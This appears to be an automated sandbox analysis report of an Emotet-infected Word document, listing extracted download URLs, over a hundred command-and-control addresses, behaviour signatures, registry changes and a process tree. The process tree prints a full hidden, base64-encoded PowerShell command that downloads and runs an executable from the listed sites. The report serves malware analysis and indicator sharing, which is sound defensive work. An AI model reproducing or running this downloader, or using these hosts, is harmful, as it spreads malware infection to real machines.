Analysis
-
max time kernel
106s -
resource
win7v191014 -
submitted
18-12-2019 03:54
Task
task1
Sample
Docs_8f05c3158a5b919ecee4db5ccc5f18ba.16.doc
Resource
win7v191014
General
Malware Config
Extracted
http://gobabynames.com/dz6r/xytx7/
http://nhomkinhthienbinh.com/cgi-bin/yW/
http://capitalcitycarwash.com/komldk65kd/7tz/
http://compscischool.com/wp-content/8a1n/
http://gianphoisonghong.com/wp-includes/AUWxwq1V2s/
Extracted
emotet
173.247.19.238:80
174.81.132.128:80
211.44.35.111:80
165.227.156.155:443
167.99.105.223:7080
67.225.179.64:8080
176.31.200.130:8080
104.131.11.150:8080
68.118.26.116:80
190.226.44.20:21
120.150.246.241:80
92.222.216.44:8080
73.214.99.25:80
110.142.38.16:80
24.93.212.32:80
190.53.135.159:21
66.209.97.122:8080
173.91.11.142:80
100.14.117.137:80
2.237.76.249:80
104.137.176.186:80
47.6.15.79:80
62.75.187.192:8080
47.156.70.145:80
201.173.217.124:443
104.131.44.150:8080
186.75.241.230:80
31.131.182.30:80
107.170.24.125:8080
110.143.84.202:80
75.80.148.244:80
186.67.208.78:8080
104.236.246.93:8080
45.51.40.140:80
45.33.49.124:443
74.105.102.97:8080
70.46.247.81:80
59.103.164.174:80
110.143.57.109:80
31.31.77.83:443
192.241.255.77:8080
195.244.215.206:80
144.139.247.220:80
103.86.49.11:8080
61.197.110.214:80
91.242.138.5:443
101.187.134.207:443
73.11.153.178:8080
190.12.119.180:443
5.196.74.210:8080
209.141.54.221:8080
169.239.182.217:8080
2.38.99.79:80
197.254.221.174:80
85.72.180.68:80
179.13.185.19:80
183.102.238.69:465
149.202.153.252:8080
64.53.242.181:8080
2.235.190.23:8080
174.77.190.137:8080
182.176.132.213:8090
167.71.10.37:8080
138.59.177.106:443
218.44.21.114:80
46.105.131.87:80
87.230.19.21:8080
37.157.194.134:443
83.136.245.190:8080
178.210.51.222:8080
108.179.206.219:8080
93.147.141.5:80
178.209.71.63:8080
64.147.15.138:80
12.176.19.218:80
128.65.154.183:443
108.191.2.72:80
217.160.182.191:8080
37.59.24.177:8080
78.24.219.147:8080
212.64.171.206:80
87.106.136.232:8080
211.63.71.72:8080
81.0.63.86:8080
80.21.182.46:80
210.6.85.121:80
188.152.7.140:80
206.189.112.148:8080
70.175.171.251:80
190.147.215.53:22
212.129.24.79:8080
98.24.231.64:80
189.209.217.49:80
91.73.197.90:80
116.48.142.21:443
209.97.168.52:8080
181.57.193.14:80
73.176.241.255:80
173.12.14.133:8080
139.130.241.252:443
200.7.243.108:443
85.152.174.56:80
165.228.24.197:80
159.65.25.128:8080
176.106.183.253:8080
5.88.182.250:80
59.148.227.190:80
31.172.240.91:8080
58.171.42.66:8080
91.205.215.66:443
1.33.230.137:80
82.155.161.203:80
95.128.43.213:8080
47.6.15.79:443
201.184.105.242:443
86.98.156.239:443
190.220.19.82:443
66.34.201.20:7080
87.106.139.101:8080
50.116.86.205:8080
5.154.58.24:80
201.251.133.92:443
101.187.247.29:80
206.81.10.215:8080
60.40.74.197:80
Signatures
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 996 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 1156 Powershell.exe -
Modifies registry class 144 IoCs
Processes:
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00E6C3CC-8874-410F-913A-A40D97723EC5}\2.0\ = "Microsoft Forms 2.0 Object Library" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9E8B4F5A-94F3-4463-B523-8BEE92118A37}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\INKEDLib.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0ECA4D58-A3CC-4019-8482-92C4F38FC297}\1.0\HELPDIR\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0ECA4D58-A3CC-4019-8482-92C4F38FC297}\1.0\ = "Microsoft InkEdit Control 1.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00E6C3CC-8874-410F-913A-A40D97723EC5}\2.0\FLAGS\ = "6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{00E6C3CC-8874-410F-913A-A40D97723EC5}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00E6C3CC-8874-410F-913A-A40D97723EC5}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 996 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEWISPTIS.EXEWISPTIS.EXE210.exe210.exenonnetsh.exenonnetsh.exepid process 996 WINWORD.EXE 2024 WISPTIS.EXE 824 WISPTIS.EXE 2176 210.exe 2192 210.exe 2260 nonnetsh.exe 2276 nonnetsh.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exenonnetsh.exepid process 1156 Powershell.exe 2276 nonnetsh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Powershell.exe210.exenonnetsh.exedescription pid process target process PID 1156 wrote to memory of 2176 1156 Powershell.exe 210.exe PID 2176 wrote to memory of 2192 2176 210.exe 210.exe PID 2260 wrote to memory of 2276 2260 nonnetsh.exe nonnetsh.exe -
Executes dropped EXE 4 IoCs
Processes:
210.exe210.exenonnetsh.exenonnetsh.exepid process 2176 210.exe 2192 210.exe 2260 nonnetsh.exe 2276 nonnetsh.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
210.exenonnetsh.exepid process 2192 210.exe 2276 nonnetsh.exe -
Drops file in System32 directory 6 IoCs
Processes:
WINWORD.EXEPowershell.exe210.exenonnetsh.exedescription ioc process File created C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD WINWORD.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT WINWORD.EXE File renamed C:\Users\Admin\210.exe => C:\Windows\SysWOW64\nonnetsh.exe 210.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat nonnetsh.exe File deleted C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8f05c3158a5b919ecee4db5ccc5f18ba.16.doc"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
-
C:\Windows\SYSTEM32\WISPTIS.EXE/QuitInfo:00000000000005F4;0000000000000644;1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\WISPTIS.EXE/QuitInfo:00000000000005F4;0000000000000644;1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABIAG0AaAB5AHoAdABvAHkAaABzAGUAPQAnAFoAeABsAG4AcgBoAHAAdQBwAGIAZQBmACcAOwAkAEEAbABxAGEAYwByAGMAagAgAD0AIAAnADIAMQAwACcAOwAkAEUAaAB5AHEAdwBxAGQAZwBhAHIAPQAnAE0AagBqAHkAeQBtAHMAcQBkAHEAJwA7ACQAQQBhAG4AaABrAHMAaQBwAHMAYwBhAGgAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBsAHEAYQBjAHIAYwBqACsAJwAuAGUAeABlACcAOwAkAEMAYgB3AHMAawBjAHQAdQBkAGMAPQAnAFQAbgBxAGQAdwBxAGwAdwAnADsAJABKAGkAYgBtAGEAcQB3AHUAbQB0AGcAcwBuAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMAbABpAGUAbgB0ADsAJABFAHEAegBhAGYAaABzAGYAYgBhAGsAPQAnAGgAdAB0AHAAOgAvAC8AZwBvAGIAYQBiAHkAbgBhAG0AZQBzAC4AYwBvAG0ALwBkAHoANgByAC8AeAB5AHQAeAA3AC8AKgBoAHQAdABwADoALwAvAG4AaABvAG0AawBpAG4AaAB0AGgAaQBlAG4AYgBpAG4AaAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHkAVwAvACoAaAB0AHQAcAA6AC8ALwBjAGEAcABpAHQAYQBsAGMAaQB0AHkAYwBhAHIAdwBhAHMAaAAuAGMAbwBtAC8AawBvAG0AbABkAGsANgA1AGsAZAAvADcAdAB6AC8AKgBoAHQAdABwADoALwAvAGMAbwBtAHAAcwBjAGkAcwBjAGgAbwBvAGwALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA4AGEAMQBuAC8AKgBoAHQAdABwADoALwAvAGcAaQBhAG4AcABoAG8AaQBzAG8AbgBnAGgAbwBuAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEEAVQBXAHgAdwBxADEAVgAyAHMALwAnAC4AIgBTAHAAYABsAEkAdAAiACgAJwAqACcAKQA7ACQARABrAGYAZABnAHMAbgB6AGkAbwBjAG4AbwA9ACcATAB3AHgAeAB5AGcAagBxAGoAZQBsAHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAagBqAHAAYwBnAHMAaQBmAHEAZgBtACAAaQBuACAAJABFAHEAegBhAGYAaABzAGYAYgBhAGsAKQB7AHQAcgB5AHsAJABKAGkAYgBtAGEAcQB3AHUAbQB0AGcAcwBuAC4AIgBkAGAAbwBgAFcAbgBMAG8AYABBAGQAZgBJAEwAZQAiACgAJABDAGoAagBwAGMAZwBzAGkAZgBxAGYAbQAsACAAJABBAGEAbgBoAGsAcwBpAHAAcwBjAGEAaAByACkAOwAkAE0AZQBpAG0AZgB5AG0AbQBnAHcAYQBnAD0AJwBGAHgAZwB6AHYAagBrAHUAbgB5AHoAcQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEEAYQBuAGgAawBzAGkAcABzAGMAYQBoAHIAKQAuACIATABFAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADMANQAxADYAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAHIAVAAiACgAJABBAGEAbgBoAGsAcwBpAHAAcwBjAGEAaAByACkAOwAkAFkAdgB3AHkAZQB2AGoAdQBiAGoAdwBoAHkAPQAnAFcAcgBjAG8AawBtAHkAbAAnADsAYgByAGUAYQBrADsAJABKAHMAcQBrAG0AbwBmAHIAcQA9ACcARABpAHkAegB3AGQAZQBwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAZQBtAGIAaABvAGYAagA9ACcASgB4AHMAdgBjAHMAagBwACcA1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
-
C:\Users\Admin\210.exe"C:\Users\Admin\210.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\210.exe--dae88dcf3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
-
C:\Windows\SysWOW64\nonnetsh.exe"C:\Windows\SysWOW64\nonnetsh.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Windows\SysWOW64\nonnetsh.exe--5bc991172⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\210.exe
-
C:\Users\Admin\210.exe
-
C:\Users\Admin\210.exe
-
C:\Windows\SysWOW64\nonnetsh.exe
-
C:\Windows\SysWOW64\nonnetsh.exe
-
memory/996-3-0x0000000009780000-0x0000000009784000-memory.dmpFilesize
16KB
-
memory/996-0-0x0000000006450000-0x0000000006454000-memory.dmpFilesize
16KB
-
memory/996-2-0x0000000006450000-0x0000000006650000-memory.dmpFilesize
2.0MB
-
memory/996-1-0x0000000006450000-0x0000000006650000-memory.dmpFilesize
2.0MB
-
memory/2176-32-0x00000000002C0000-0x00000000002D7000-memory.dmpFilesize
92KB
-
memory/2192-35-0x0000000000260000-0x0000000000277000-memory.dmpFilesize
92KB
-
memory/2192-36-0x0000000000400000-0x0000000000454000-memory.dmpFilesize
336KB
-
memory/2260-38-0x0000000000390000-0x00000000003A7000-memory.dmpFilesize
92KB
-
memory/2276-40-0x0000000000370000-0x0000000000387000-memory.dmpFilesize
92KB
-
memory/2276-41-0x0000000000400000-0x0000000000454000-memory.dmpFilesize
336KB